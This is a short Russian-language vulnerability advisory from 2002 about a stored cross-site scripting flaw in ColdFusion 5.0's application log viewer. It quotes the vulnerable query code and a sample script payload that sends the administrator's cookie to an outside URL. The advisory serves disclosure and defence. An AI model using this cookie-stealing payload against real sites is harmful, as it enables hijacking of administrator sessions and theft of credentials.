Дата публикации: | 19.12.2002 |
Всего просмотров: | 1049 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Администратор coldfusion может просматривать журнал приложений через Web браузер. Уязвимость позволяет атакующему записать произвольный Javascript код в application log, который будет выполнен при просмотре журнала администратором. Вот часть уязвимого кода:
<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#"> SELECT * FROM Products Where ProductId = #int(url.productid)# </CFQUERY>если функция INT сталкивается с не числовым значением, она выдает ошибку и пишет значение в журнал регистрации приложений. Если url.productid содержит что-то типа такого: <iframe name="frame1" width="0" height="0"></iframe> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie=" + document.cookie</script>То при просмотре application log, атакующий может похитить Куки администратора, в которых хранится пароль в зашифрованном виде. Существует множество других функций, пишущих информацию в журнал регистрации приложений. |
Ссылки: | Cross-site scripting vulnerability in CF 5.0. |